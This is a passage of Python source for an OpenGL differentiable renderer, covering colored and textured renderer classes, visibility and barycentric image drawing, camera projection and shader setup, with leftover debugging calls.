# GL.glDisable(GL.GL_POLYGON_OFFSET_LINE)
# GL.glDepthMask(GL.GL_TRUE)
# if hidden_wireframe:
# GL.glEnable(GL.GL_DEPTH_TEST)
# GL.glEnable(GL.GL_POLYGON_OFFSET_FILL)
# #Pol change it to a smaller number to avoid double edges in my teapot.
# GL.glPolygonOffset(1.0, 1.0)
# GL.glPolygonMode(GL.GL_FRONT_AND_BACK, GL.GL_FILL)
# # self.draw_colored_primitives(self.vao_dyn_ub, v, f, fc=np.zeros(f.shape).astype(np.uint8))
# self.draw_colored_verts(np.zeros_like(self.vc.r))
# # self.draw_colored_primitives(self.vaoub, v, e, np.zeros_like(ec).astype(np.uint8))
# # self.projectionMatrix[2,2] -= delta
# GL.glDisable(GL.GL_POLYGON_OFFSET_FILL)
GL.glBindFramebuffer(GL.GL_FRAMEBUFFER, self.fbo)
GL.glReadBuffer(GL.GL_COLOR_ATTACHMENT0)
raw = np.flipud(np.frombuffer(GL.glReadPixels( 0,0, self.frustum['width'], self.frustum['height'], GL.GL_RGB, GL.GL_UNSIGNED_BYTE), np.uint8).reshape(self.frustum['height'],self.frustum['height'],3).astype(np.uint32))
raw = raw[:,:,0] + raw[:,:,1]*256 + raw[:,:,2]*256*256 - 1
GL.glClear(GL.GL_COLOR_BUFFER_BIT | GL.GL_DEPTH_BUFFER_BIT)
return raw
def draw_edge_visibility_aa(self, v, e, f, hidden_wireframe=True):
"""Assumes camera is set up correctly in gl context."""
shaders.glUseProgram(self.colorProgram)
GL.glBindFramebuffer(GL.GL_FRAMEBUFFER, self.fbo)
GL.glDepthMask(GL.GL_TRUE)
GL.glEnable(GL.GL_DEPTH_TEST)
GL.glClear(GL.GL_COLOR_BUFFER_BIT | GL.GL_DEPTH_BUFFER_BIT)
GL.glEnable(GL.GL_POLYGON_OFFSET_FILL)
GL.glPolygonOffset(1, 1)
self.draw_colored_verts(np.zeros_like(self.vc.r))
GL.glDisable(GL.GL_POLYGON_OFFSET_FILL)
# GL.glClear(GL.GL_COLOR_BUFFER_BIT)
ec = np.arange(1, len(e)+1)
ec = np.tile(ec.reshape((-1,1)), (1, 3))
ec[:, 0] = ec[:, 0] & 255
ec[:, 1] = (ec[:, 1] >> 8 ) & 255
ec[:, 2] = (ec[:, 2] >> 16 ) & 255
ec = np.asarray(ec, dtype=np.uint8)
ec = np.ones_like(ec, dtype=np.uint8)*255
# GL.glDepthFunc(GL.GL_GREATER)
# GL.glEnable(GL.GL_POLYGON_OFFSET_LINE)
# GL.glPolygonOffset(-10000.0, -10000.0)
# GL.glDepthMask(GL.GL_FALSE)
# self.projectionMatrix[2, 2] += 0.0000001
GL.glDepthFunc(GL.GL_LEQUAL)
GL.glEnable(GL.GL_MULTISAMPLE)
GL.glPolygonMode(GL.GL_FRONT_AND_BACK, GL.GL_LINE)
GL.glEnable(GL.GL_LINE_SMOOTH)
GL.glEnable(GL.GL_BLEND)
# GL.glBlendFunc(GL.GL_SRC_ALPHA, GL.GL_ONE_MINUS_SRC_ALPHA)
GL.glHint(GL.GL_LINE_SMOOTH_HINT, GL.GL_NICEST)
GL.glLineWidth(1)
self.draw_colored_primitives(self.vao_dyn_ub, v, e, ec)
GL.glPolygonMode(GL.GL_FRONT_AND_BACK, GL.GL_FILL)
GL.glLineWidth(self.line_width)
GL.glDisable(GL.GL_MULTISAMPLE)
GL.glDisable(GL.GL_LINE_SMOOTH)
GL.glDisable(GL.GL_BLEND)
GL.glDepthFunc(GL.GL_LESS)
# self.projectionMatrix[2, 2] -= 0.0000001
# GL.glDisable(GL.GL_POLYGON_OFFSET_LINE)
# GL.glDepthMask(GL.GL_TRUE)
# if hidden_wireframe:
# GL.glEnable(GL.GL_DEPTH_TEST)
# GL.glEnable(GL.GL_POLYGON_OFFSET_FILL)
# #Pol change it to a smaller number to avoid double edges in my teapot.
# GL.glPolygonOffset(1.0, 1.0)
# GL.glPolygonMode(GL.GL_FRONT_AND_BACK, GL.GL_FILL)
# # self.draw_colored_primitives(self.vao_dyn_ub, v, f, fc=np.zeros(f.shape).astype(np.uint8))
# self.draw_colored_verts(np.zeros_like(self.vc.r))
# # self.draw_colored_primitives(self.vaoub, v, e, np.zeros_like(ec).astype(np.uint8))
# # self.projectionMatrix[2,2] -= delta
# GL.glDisable(GL.GL_POLYGON_OFFSET_FILL)
GL.glBindFramebuffer(GL.GL_FRAMEBUFFER, self.fbo)
GL.glReadBuffer(GL.GL_COLOR_ATTACHMENT0)
raw = np.flipud(np.frombuffer(GL.glReadPixels( 0,0, self.frustum['width'], self.frustum['height'], GL.GL_RGB, GL.GL_UNSIGNED_BYTE), np.uint8).reshape(self.frustum['height'],self.frustum['height'],3).astype(np.uint32))
raw = raw[:,:,0] + raw[:,:,1]*256 + raw[:,:,2]*256*256
plt.imsave('raw.png',raw)
import ipdb; ipdb.set_trace()
GL.glClear(GL.GL_COLOR_BUFFER_BIT | GL.GL_DEPTH_BUFFER_BIT)
return raw
# this assumes that fc is either "by faces" or "verts by face", not "by verts"
def draw_colored_primitives(self, vao, v, f, fc=None):
GL.glUseProgram(self.colorProgram)
# gl.EnableClientState(GL_VERTEX_ARRAY)
verts_by_face = np.asarray(v.reshape((-1,3))[f.ravel()], dtype=np.float64, order='C')
# gl.VertexPointer(verts_by_face)
GL.glBindVertexArray(vao)
self.vbo_verts_dyn.set_array(verts_by_face.astype(np.float32))
self.vbo_verts_dyn.bind()
if fc is not None:
# gl.EnableClientState(GL_COLOR_ARRAY)
if fc.size == verts_by_face.size:
vc_by_face = fc
else:
vc_by_face = np.repeat(fc, f.shape[1], axis=0)
if vc_by_face.size != verts_by_face.size:
raise Exception('fc must have either rows=(#rows in faces) or rows=(# elements in faces)')
if isinstance(fc[0,0], np.float32) or isinstance(fc[0,0], np.float64):
vc_by_face = np.asarray(vc_by_face, dtype=np.float32, order='C')
self.vbo_colors.set_array(vc_by_face)
self.vbo_colors.bind()
elif isinstance(fc[0,0], np.uint8):
vc_by_face = np.asarray(vc_by_face, dtype=np.uint8, order='C')
self.vbo_colors_ub.set_array(vc_by_face)
self.vbo_colors_ub.bind()
else:
raise Exception('Unknown color type for fc')
else:
self.vbo_colors.set_array(np.zeros_like(verts_by_face, dtype=np.float32))
self.vbo_colors.bind()
if f.shape[1]==2:
primtype = GL.GL_LINES
else:
primtype = GL.GL_TRIANGLES
self.vbo_indices_dyn.set_array(np.arange(f.size, dtype=np.uint32).ravel())
self.vbo_indices_dyn.bind()
GL.glBindFramebuffer(GL.GL_DRAW_FRAMEBUFFER, self.fbo)
view_mtx = self.camera.openglMat.dot(np.asarray(np.vstack((self.camera.view_matrix, np.array([0, 0, 0, 1]))),np.float32))
GL.glUniformMatrix4fv(self.MVP_location, 1, GL.GL_TRUE, np.dot(self.projectionMatrix, view_mtx))
# if primtype == GL.GL_LINES:
# GL.glPolygonMode(GL.GL_FRONT_AND_BACK, GL.GL_FILL)
# else:
# GL.glPolygonMode(GL.GL_FRONT_AND_BACK, GL.GL_FILL)
GL.glDrawElements(primtype, len(self.vbo_indices_dyn), GL.GL_UNSIGNED_INT, None)
#Pol: FIX THIS (UNCOMMENT)
if primtype == GL.GL_LINES:
# GL.glPolygonMode(GL.GL_FRONT_AND_BACK, GL.GL_FILL)
f = np.fliplr(f).copy()
verts_by_edge = v.reshape((-1,3))[f.ravel()]
verts_by_edge = np.asarray(verts_by_edge, dtype=np.float32, order='C')
self.vbo_verts_dyn.set_array(verts_by_edge)
self.vbo_verts_dyn.bind()
self.vbo_indices_dyn.set_array(np.arange(f.size, dtype=np.uint32).ravel())
self.vbo_indices_dyn.bind()
# GL.glDrawElements(GL.GL_LINES, len(self.vbo_indices_dyn), GL.GL_UNSIGNED_INT, None)
# GL.glPolygonMode(GL.GL_FRONT_AND_BACK, GL.GL_FILL)
GL.glPolygonMode(GL.GL_FRONT_AND_BACK, GL.GL_FILL)
def compute_vpe_boundary_idxs(self, v, f, camera, fpe):
# Figure out which edges are on pairs of differently visible triangles
#ray = cv2.Rodrigues(camera.rt.r)[0].T[:,2]
campos = -cv2.Rodrigues(camera.rt.r)[0].T.dot(camera.t.r)
rays_to_verts = v.reshape((-1,3)) - row(campos)
rays_to_faces = rays_to_verts.take(f[:,0],axis=0) +rays_to_verts.take(f[:,1],axis=0) +rays_to_verts.take(f[:,2],axis=0)
# rays_to_faces = np.sum(rays_to_verts.take(f[:,:],axis=0), axis=1)
faces_invisible = np.sum(rays_to_faces * self.tn, axis=1)
dps = faces_invisible.take(fpe[:,0]) * faces_invisible.take(fpe[:,1])
# dps = faces_invisible0 * faces_invisible1
# idxs = (dps<=0) & (faces_invisible.take(fpe[:,0]) + faces_invisible.take(fpe[:,1]) > 0.0)
silhouette_edges = np.asarray(np.nonzero(dps<=0.)[0], np.uint32)
self.vis_silhouette_face = np.c_[faces_invisible.take(fpe[:, 0])[dps <= 0.], faces_invisible.take(fpe[:, 1])[dps <= 0.]] < 0
# silhouette_edges = np.asarray(np.nonzero(dps<=1e-5)[0], np.uint32)
return silhouette_edges, faces_invisible < 0
def draw_boundaryid_image(self, v, f, vpe, fpe, camera):
GL.glUseProgram(self.colorProgram)
if False:
visibility = self.draw_edge_visibility(v, vpe, f, hidden_wireframe=True)
return visibility
if True:
#try:
view_mtx = self.camera.openglMat.dot(np.asarray(np.vstack((self.camera.view_matrix, np.array([0, 0, 0, 1]))),np.float32))
GL.glUniformMatrix4fv(self.MVP_location, 1, GL.GL_TRUE, np.dot(self.projectionMatrix, view_mtx))
GL.glBindFramebuffer(GL.GL_DRAW_FRAMEBUFFER, self.fbo)
GL.glClear(GL.GL_COLOR_BUFFER_BIT | GL.GL_DEPTH_BUFFER_BIT);
silhouette_edges, faces_facing_camera = self.compute_vpe_boundary_idxs(v, f, camera, fpe)
# self.faces_facing_camera = faces_facing_camera
self.silhouette_edges = silhouette_edges
lines_e = vpe[silhouette_edges]
self.lines_e = lines_e
lines_v = v
if len(lines_e)==0:
return np.ones((self.frustum['height'], self.frustum['width'])).astype(np.int32) * 4294967295
# fpe = fpe[np.any(np.in1d(fpe, np.unique(self.visibility_image[self.visibility_image != 4294967295])).reshape([-1, 2]), 1)]
visibility = self.draw_edge_visibility(lines_v, lines_e, f, hidden_wireframe=True)
visibility_edge = visibility.copy()
# plt.imsave("opendr_boundary_edge_visibility.png", visibility)
shape = visibility.shape
visibility = visibility.ravel()
visible = np.nonzero(visibility.ravel() != 4294967295)[0]
visibility[visible] = silhouette_edges.take(visibility.take(visible))
self.frontFacingEdgeFaces = np.zeros([visibility_edge.shape[0],visibility_edge.shape[1], 2]).astype(np.int32).reshape([-1,2])
self.frontFacingEdgeFaces[visible] = self.vis_silhouette_face[visibility_edge.ravel().take(visible)]
# plt.imsave("opendr_boundary_edge_visibility_result.png", visibility.reshape(shape))
return visibility.reshape(shape)
def draw_boundaryid_image_aa(self, v, f, vpe, fpe, camera):
GL.glUseProgram(self.colorProgram)
if False:
visibility = self.draw_edge_visibility(v, vpe, f, hidden_wireframe=True)
return visibility
if True:
#try:
view_mtx = self.camera.openglMat.dot(np.asarray(np.vstack((self.camera.view_matrix, np.array([0, 0, 0, 1]))),np.float32))
GL.glUniformMatrix4fv(self.MVP_location, 1, GL.GL_TRUE, np.dot(self.projectionMatrix, view_mtx))
GL.glBindFramebuffer(GL.GL_DRAW_FRAMEBUFFER, self.fbo)
GL.glClear(GL.GL_COLOR_BUFFER_BIT | GL.GL_DEPTH_BUFFER_BIT);
silhouette_edges, faces_facing_camera = self.compute_vpe_boundary_idxs(v, f, camera, fpe)
# self.faces_facing_camera = faces_facing_camera
self.silhouette_edges = silhouette_edges
lines_e = vpe[silhouette_edges]
self.lines_e = lines_e
lines_v = v
if len(lines_e)==0:
return np.ones((self.frustum['height'], self.frustum['width'])).astype(np.int32) * 4294967295
# fpe = fpe[np.any(np.in1d(fpe, np.unique(self.visibility_image[self.visibility_image != 4294967295])).reshape([-1, 2]), 1)]
visibility = self.draw_edge_visibility_aa(lines_v, lines_e, f, hidden_wireframe=True)
visibility_edge = visibility.copy()
# plt.imsave("opendr_boundary_edge_visibility.png", visibility)
shape = visibility.shape
visibility = visibility.ravel()
visible = np.nonzero(visibility.ravel() != 4294967295)[0]
visibility[visible] = silhouette_edges.take(visibility.take(visible))
self.frontFacingEdgeFaces = np.zeros([visibility_edge.shape[0],visibility_edge.shape[1], 2]).astype(np.int32).reshape([-1,2])
self.frontFacingEdgeFaces[visible] = self.vis_silhouette_face[visibility_edge.ravel().take(visible)]
# plt.imsave("opendr_boundary_edge_visibility_result.png", visibility.reshape(shape))
return visibility.reshape(shape)
def draw_visibility_image(self, v, f, boundarybool_image=None):
v = np.asarray(v)
# gl.Disable(GL_TEXTURE_2D)
# gl.DisableClientState(GL_TEXTURE_COORD_ARR
shaders.glUseProgram(self.colorProgram)
self.makeCurrentContext()
result = self.draw_visibility_image_internal(v, f)
if boundarybool_image is None:
return result
rr = result.ravel()
faces_to_draw = np.unique(rr[rr != 4294967295])
if len(faces_to_draw)==0:
result = np.ones((self.frustum['height'], self.frustum['width'])).astype(np.uint32)*4294967295
return result
GL.glPolygonMode(GL.GL_FRONT_AND_BACK, GL.GL_LINE)
result2 = self.draw_visibility_image_internal(v, f)
GL.glPolygonMode(GL.GL_FRONT_AND_BACK, GL.GL_FILL)
bbi = boundarybool_image
# result2 = result2.ravel()
# idxs = result2 != 4294967295
# result2[idxs] = faces_to_draw[result2[idxs]]
if False:
import matplotlib.pyplot as plt
result2 = result2.reshape(result.shape[:2])
plt.figure()
plt.subplot(121)
plt.imshow(result.squeeze())
plt.subplot(122)
plt.imshow(result2.squeeze())
plt.show()
pdb.set_trace()
result2 = result2.reshape(result.shape[:2])
return result2 * bbi + result * (1 - bbi)
def draw_visibility_image_internal(self, v, f):
"""Assumes camera is set up correctly in"""
GL.glUseProgram(self.colorProgram)
#Attach FBO
GL.glBindFramebuffer(GL.GL_DRAW_FRAMEBUFFER, self.fbo)
GL.glClear(GL.GL_COLOR_BUFFER_BIT | GL.GL_DEPTH_BUFFER_BIT)
fc = np.arange(1, len(f)+1)
fc = np.tile(fc.reshape((-1,1)), (1, 3))
fc[:, 0] = fc[:, 0] & 255
fc[:, 1] = (fc[:, 1] >> 8 ) & 255
fc[:, 2] = (fc[:, 2] >> 16 ) & 255
fc = np.asarray(fc, dtype=np.uint8)
self.draw_colored_primitives(self.vao_dyn_ub, v, f, fc)
#Read image.
GL.glBindFramebuffer(GL.GL_FRAMEBUFFER, self.fbo)
GL.glReadBuffer(GL.GL_COLOR_ATTACHMENT0)
raw = np.flipud(np.frombuffer(GL.glReadPixels( 0,0, self.frustum['width'], self.frustum['height'], GL.GL_RGB, GL.GL_UNSIGNED_BYTE), np.uint8).reshape(self.frustum['height'],self.frustum['height'],3).astype(np.uint32))
# plt.imsave("draw_edge_visibility_internal_raw1.png", raw)
return raw[:,:,0] + raw[:,:,1]*256 + raw[:,:,2]*256*256 - 1
def draw_barycentric_image(self, boundarybool_image=None):
GL.glDisable(GL.GL_CULL_FACE)
without_overdraw = self.draw_barycentric_image_internal()
if boundarybool_image is None:
return without_overdraw
# return without_overdraw
GL.glPolygonMode(GL.GL_FRONT_AND_BACK, GL.GL_LINE)
overdraw = self.draw_barycentric_image_internal()
GL.glPolygonMode(GL.GL_FRONT_AND_BACK, GL.GL_FILL)
bbi = np.atleast_3d(boundarybool_image)
return bbi * overdraw + (1. - bbi) * without_overdraw
def draw_barycentric_image_internal(self):
GL.glUseProgram(self.colorProgram)
view_mtx = self.camera.openglMat.dot(np.asarray(np.vstack((self.camera.view_matrix, np.array([0, 0, 0, 1]))),np.float32))
GL.glUniformMatrix4fv(self.MVP_location, 1, GL.GL_TRUE, np.dot(self.projectionMatrix, view_mtx))
GL.glBindVertexArray(self.vao_static_face)
GL.glBindFramebuffer(GL.GL_DRAW_FRAMEBUFFER, self.fbo)
GL.glClear(GL.GL_COLOR_BUFFER_BIT | GL.GL_DEPTH_BUFFER_BIT)
GL.glDrawElements(GL.GL_TRIANGLES if self.f.shape[1]==3 else GL.GL_LINES, len(self.vbo_indices_range), GL.GL_UNSIGNED_INT, None)
#Read image.
GL.glBindFramebuffer(GL.GL_FRAMEBUFFER, self.fbo)
GL.glReadBuffer(GL.GL_COLOR_ATTACHMENT0)
# return np.array(im.transpose(Image.FLIP_TOP_BOTTOM), np.float64)/255.0
return np.flipud(np.frombuffer(GL.glReadPixels( 0,0, self.frustum['width'], self.frustum['height'], GL.GL_RGB, GL.GL_UNSIGNED_BYTE), np.uint8).reshape(self.frustum['height'],self.frustum['height'],3).astype(np.float64))/255.0
def setup_camera(self, camera):
near = 0.01
far = 10
fx = camera.f.r[0]
fy = camera.f.r[1]
cx = camera.c.r[0]
cy = camera.c.r[1]
self.projectionMatrix = np.array([[fx / cx, 0, 0, 0], [0, fy / cy, 0, 0], [0, 0, -(near + far) / (far - near), -2 * near * far / (far - near)], [0, 0, -1, 0]], dtype=np.float32)
# self.projectionMatrix = np.array([[camera.f.r[0], 0, camera.c.r[0], 0], [0, camera.f.r[1], camera.c.r[1], 0], [0, 0, 1, 0], [0, 0, 1, 0]], dtype=np.float32, order='F')
def setup_camera_old(self, camera, frustum):
self._setup_camera(camera.c.r[0], camera.c.r[1],
camera.f.r[0], camera.f.r[1],
frustum['width'], frustum['height'],
frustum['near'], frustum['far'],
camera.view_matrix,
camera.k.r)
class ColoredRenderer(BaseRenderer):
terms = 'f', 'frustum', 'background_image', 'overdraw', 'num_channels'
dterms = 'vc', 'camera', 'bgcolor' , 'v'
@depends_on('vc')
def num_channels(self):
if hasattr(self, 'vc'):
return self.vc.shape[1]
return 3
def clear(self):
# print ("Clearing color renderer.")
super().clear()
@property
def shape(self):
if not hasattr(self, 'num_channels'):
self.num_channels = 3
if self.num_channels > 1:
return (self.frustum['height'], self.frustum['width'], self.num_channels)
else:
return (self.frustum['height'], self.frustum['width'])
def compute_r(self):
return self.color_image # .reshape((self.frustum['height'], self.frustum['width'], -1)).squeeze()
def compute_dr_wrt(self, wrt):
if wrt is not self.camera and wrt is not self.vc and wrt is not self.bgcolor:
return None
visibility = self.visibility_image
shape = visibility.shape
color = self.color_image
visible = np.nonzero(visibility.ravel() != 4294967295)[0]
num_visible = len(visible)
barycentric = self.barycentric_image
if wrt is self.camera:
if self.overdraw:
# return common.dImage_wrt_2dVerts_bnd(color, visible, visibility, barycentric, self.frustum['width'], self.frustum['height'], self.v.r.size/3, self.f, self.boundaryid_image != 4294967295)
return common.dImage_wrt_2dVerts_bnd(color, visible, visibility, barycentric, self.frustum['width'], self.frustum['height'], self.v.r.size/3, self.f, self.boundaryid_image != 4294967295)
else:
return common.dImage_wrt_2dVerts(color, visible, visibility, barycentric, self.frustum['width'], self.frustum['height'], self.v.r.size/3, self.f)
elif wrt is self.vc:
return common.dr_wrt_vc(visible, visibility, self.f, barycentric, self.frustum, self.vc.size, num_channels=self.num_channels)
elif wrt is self.bgcolor:
return common.dr_wrt_bgcolor(visibility, self.frustum, num_channels=self.num_channels)
def on_changed(self, which):
if 'frustum' in which:
w = self.frustum['width']
h = self.frustum['height']
if 'frustum' in which or 'camera' in which:
self.setup_camera(self.camera)
# setup_camera(self.glf, self.camera, self.frustum)
if not hasattr(self, 'num_channels'):
self.num_channels = 3
if not hasattr(self, 'bgcolor'):
self.bgcolor = Ch(np.array([.5]*self.num_channels))
which.add('bgcolor')
if not hasattr(self, 'overdraw'):
self.overdraw = True
'''
if 'v' or 'f' in which:
self.vbo_verts_face.set_array(np.array(self.verts_by_face).astype(np.float32))
self.vbo_verts_face.bind()
self.vbo_colors_face.set_array(np.array(self.vc_by_face).astype(np.float32))
self.vbo_colors_face.bind()
if 'v' in which:
self.vbo_verts.set_array(self.v.r.astype(np.float32))
self.vbo_verts.bind()
if 'f' in which:
self.vbo_indices.set_array(self.f.astype(np.uint32))
self.vbo_indices.bind()
self.vbo_indices_range.set_array(np.arange(self.f.size, dtype=np.uint32).ravel())
self.vbo_indices_range.bind()
'''
def flow_to(self, v_next, cam_next=None):
return common.flow_to(self, v_next, cam_next)
def filter_for_triangles(self, which_triangles):
cim = self.color_image
vim = self.visibility_image+1
arr = np.zeros(len(self.f)+1)
arr[which_triangles+1] = 1
relevant_pixels = arr[vim.ravel()]
cim2 = cim.copy() * np.atleast_3d(relevant_pixels.reshape(vim.shape))
relevant_pixels = np.nonzero(arr[vim.ravel()])[0]
xs = relevant_pixels % vim.shape[1]
ys = relevant_pixels / vim.shape[1]
return cim2[np.min(ys):np.max(ys), np.min(xs):np.max(xs), :]
def draw_color_image(self):
self.makeCurrentContext()
self._call_on_changed()
try:
GL.glEnable(GL.GL_MULTISAMPLE)
if hasattr(self, 'bgcolor'):
GL.glClearColor(self.bgcolor.r[0], self.bgcolor.r[1%self.num_channels], self.bgcolor.r[2%self.num_channels], 1.)
# use face colors if given
# FIXME: this won't work for 2 channels
GL.glBindFramebuffer(GL.GL_DRAW_FRAMEBUFFER, self.fbo)
GL.glClear(GL.GL_COLOR_BUFFER_BIT | GL.GL_DEPTH_BUFFER_BIT)
if self.msaa:
GL.glBindFramebuffer(GL.GL_DRAW_FRAMEBUFFER, self.fbo_ms)
else:
GL.glBindFramebuffer(GL.GL_DRAW_FRAMEBUFFER, self.fbo_noms)
GL.glClear(GL.GL_COLOR_BUFFER_BIT | GL.GL_DEPTH_BUFFER_BIT)
self.draw_colored_verts(self.vc.r)
if self.msaa:
GL.glBindFramebuffer(GL.GL_READ_FRAMEBUFFER, self.fbo_ms)
else:
GL.glBindFramebuffer(GL.GL_READ_FRAMEBUFFER, self.fbo_noms)
GL.glBindFramebuffer(GL.GL_DRAW_FRAMEBUFFER, self.fbo)
GL.glBlitFramebuffer(0, 0, self.frustum['width'], self.frustum['height'], 0, 0, self.frustum['width'], self.frustum['height'], GL.GL_COLOR_BUFFER_BIT, GL.GL_LINEAR)
GL.glBindFramebuffer(GL.GL_FRAMEBUFFER, self.fbo)
GL.glReadBuffer(GL.GL_COLOR_ATTACHMENT0)
result = np.flipud(np.frombuffer(GL.glReadPixels( 0,0, self.frustum['width'], self.frustum['height'], GL.GL_RGB, GL.GL_UNSIGNED_BYTE), np.uint8).reshape(self.frustum['height'],self.frustum['height'],3).astype(np.float64))/255.0
# plt.imsave("opendr_draw_color_image.png", result)
GL.glBindFramebuffer(GL.GL_DRAW_FRAMEBUFFER, self.fbo)
GL.glDisable(GL.GL_MULTISAMPLE)
GL.glClearColor(0.,0.,0., 1.)
if hasattr(self, 'background_image'):
bg_px = np.tile(np.atleast_3d(self.visibility_image) == 4294967295, (1,1,self.num_channels)).squeeze()
fg_px = 1 - bg_px
result = bg_px * self.background_image + fg_px * result
return result
except:
import pdb; pdb.set_trace()
'''
@depends_on(dterms+terms)
def color_image(self):
GL.glPolygonMode(GL.GL_FRONT_AND_BACK, GL.GL_FILL)
no_overdraw = self.draw_color_image()
if not self.overdraw:
return no_overdraw
GL.glPolygonMode(GL.GL_FRONT_AND_BACK, GL.GL_LINE)
overdraw = self.draw_color_image()
GL.glPolygonMode(GL.GL_FRONT_AND_BACK, GL.GL_FILL)
boundarybool_image = self.boundarybool_image
if self.num_channels > 1:
boundarybool_image = np.atleast_3d(boundarybool_image)
return np.asarray((overdraw*boundarybool_image + no_overdraw*(1-boundarybool_image)), order='C')
'''
class TexturedRenderer(ColoredRenderer):
terms = 'f', 'frustum', 'vt', 'ft', 'background_image', 'ft_list', 'haveUVs_list', 'textures_list', 'vc_list'
dterms = 'vc', 'camera', 'bgcolor', 'texture_stack', 'v'
# def __init__(self):
# try:
# self.overdraw
# except:
# self.overdraw = True
#
# try:
# self.nsamples
# except:
# self.nsamples = 8
def clear(self):
try:
GL.glFlush()
GL.glFinish()
# print ("Clearing textured renderer.")
# for msh in self.vbo_indices_mesh_list:
# for vbo in msh:
# vbo.set_array([])
[vbo.set_array(np.array([])) for sublist in self.vbo_indices_mesh_list for vbo in sublist]
[vbo.bind() for sublist in self.vbo_indices_mesh_list for vbo in sublist]
[vbo.unbind() for sublist in self.vbo_indices_mesh_list for vbo in sublist]
[vbo.delete() for sublist in self.vbo_indices_mesh_list for vbo in sublist]
[vbo.set_array(np.array([])) for vbo in self.vbo_colors_mesh]
[vbo.bind() for vbo in self.vbo_colors_mesh]
[vbo.delete() for vbo in self.vbo_colors_mesh]
[vbo.unbind() for vbo in self.vbo_colors_mesh]
[vbo.delete() for vbo in self.vbo_verts_mesh]
[vbo.set_array(np.array([])) for vbo in self.vbo_uvs_mesh]
[vbo.bind() for vbo in self.vbo_uvs_mesh]
[vbo.unbind() for vbo in self.vbo_uvs_mesh]
[vbo.delete() for vbo in self.vbo_uvs_mesh]
[GL.glDeleteVertexArrays(1, [vao.value]) for sublist in self.vao_tex_mesh_list for vao in sublist]
self.release_textures()
if self.glMode == 'glfw':
import glfw
glfw.make_context_current(self.win)
GL.glDeleteProgram(self.colorTextureProgram)
super().clear()
except:
pdb.set_trace()
print("Program had not been initialized")
def initGLTexture(self):
print("Initializing Texture OpenGL.")
GL.glLineWidth(1.)
FRAGMENT_SHADER = shaders.compileShader("""#version 330 core
// Interpolated values from the vertex shaders
//#extension GL_EXT_shader_image_load_store : enable
in vec3 theColor;
in vec2 UV;
uniform sampler2D myTextureSampler;
// Ouput data
out vec3 color;
void main(){
color = theColor * texture2D( myTextureSampler, UV).rgb;
}""", GL.GL_FRAGMENT_SHADER)
VERTEX_SHADER = shaders.compileShader("""#version 330 core
// Input vertex data, different for all executions of this shader.
layout (location = 0) in vec3 position;
layout (location = 1) in vec3 color;
layout(location = 2) in vec2 vertexUV;
uniform mat4 MVP;
out vec3 theColor;
out vec2 UV;
// Values that stay constant for the whole mesh.
void main(){
// Output position of the vertex, in clip space : MVP * position
gl_Position = MVP* vec4(position,1);
theColor = color;
UV = vertexUV;
}""", GL.GL_VERTEX_SHADER)
self.colorTextureProgram = shaders.compileProgram(VERTEX_SHADER,FRAGMENT_SHADER)
#Define the other VAO/VBOs and shaders.
#Text VAO and bind color, vertex indices AND uvbuffer:
position_location = GL.glGetAttribLocation(self.colorTextureProgram, 'position')
color_location = GL.glGetAttribLocation(self.colorTextureProgram, 'color')
uvs_location = GL.glGetAttribLocation(self.colorTextureProgram, 'vertexUV')
# color_location_ub = GL.glGetAttribLocation(self.colorProgram, 'color')
self.MVP_texture_location = GL.glGetUniformLocation(self.colorTextureProgram, 'MVP')
self.vbo_indices_mesh_list = []
self.vbo_colors_mesh = []
self.vbo_verts_mesh = []
self.vao_tex_mesh_list = []
self.vbo_uvs_mesh = []
self.textureID_mesh_list = []
for mesh in range(len(self.f_list)):
vbo_verts = vbo.VBO(np.array(self.v_list[mesh]).astype(np.float32))
vbo_colors = vbo.VBO(np.array(self.vc_list[mesh]).astype(np.float32))
vbo_uvs = vbo.VBO(np.array(self.ft_list[mesh]).astype(np.float32))
self.vbo_colors_mesh = self.vbo_colors_mesh + [vbo_colors]
self.vbo_verts_mesh = self.vbo_verts_mesh + [vbo_verts]
self.vbo_uvs_mesh = self.vbo_uvs_mesh + [vbo_uvs]
vaos_mesh = []
vbo_indices_mesh = []
textureIDs_mesh = []
for polygons in range(len(self.f_list[mesh])):
vao = GL.GLuint(0)
GL.glGenVertexArrays(1, vao)
GL.glBindVertexArray(vao)
vbo_indices = vbo.VBO(np.array(self.f_list[mesh][polygons]).astype(np.uint32), target=GL.GL_ELEMENT_ARRAY_BUFFER)
vbo_indices.bind()
vbo_verts.bind()
GL.glEnableVertexAttribArray(position_location) # from 'location = 0' in shader
GL.glVertexAttribPointer(position_location, 3, GL.GL_FLOAT, GL.GL_FALSE, 0, None)
vbo_colors.bind()
GL.glEnableVertexAttribArray(color_location) # from 'location = 0' in shader
GL.glVertexAttribPointer(color_location, 3, GL.GL_FLOAT, GL.GL_FALSE, 0, None)
if self.haveUVs_list[mesh][polygons]:
vbo_uvs.bind()
GL.glEnableVertexAttribArray(uvs_location) # from 'location = 0' in shader
GL.glVertexAttribPointer(uvs_location, 2, GL.GL_FLOAT, GL.GL_FALSE, 0, None)
#Textures:
texture = None
if self.haveUVs_list[mesh][polygons]:
texture = GL.GLuint(0)
GL.glGenTextures( 1, texture )
GL.glPixelStorei(GL.GL_UNPACK_ALIGNMENT,1)
GL.glTexParameterf(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_MAG_FILTER, GL.GL_LINEAR)
GL.glTexParameterf(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_MIN_FILTER, GL.GL_LINEAR_MIPMAP_LINEAR)
GL.glTexParameteri(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_BASE_LEVEL, 0)
GL.glTexParameteri(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_MAX_LEVEL, 0)
GL.glBindTexture(GL.GL_TEXTURE_2D, texture)
image = np.array(np.flipud((self.textures_list[mesh][polygons])), order='C', dtype=np.float32)
GL.glTexStorage2D(GL.GL_TEXTURE_2D, 1, GL.GL_RGB32F, image.shape[1], image.shape[0])
GL.glTexSubImage2D(GL.GL_TEXTURE_2D, 0, 0, 0, image.shape[1], image.shape[0], GL.GL_RGB, GL.GL_FLOAT, image)
# GL.glTexSubImage2D(GL.GL_TEXTURE_2D, 0, 0, 0, image.shape[1], image.shape[0], GL.GL_RGB, GL.GL_FLOAT, image.reshape([image.shape[1], image.shape[0], -1]).ravel().tostring())
textureIDs_mesh = textureIDs_mesh + [texture]
vbo_indices_mesh = vbo_indices_mesh + [vbo_indices]
vaos_mesh = vaos_mesh + [vao]
self.textureID_mesh_list = self.textureID_mesh_list + [textureIDs_mesh]
self.vao_tex_mesh_list = self.vao_tex_mesh_list + [vaos_mesh]
self.vbo_indices_mesh_list = self.vbo_indices_mesh_list + [vbo_indices_mesh]
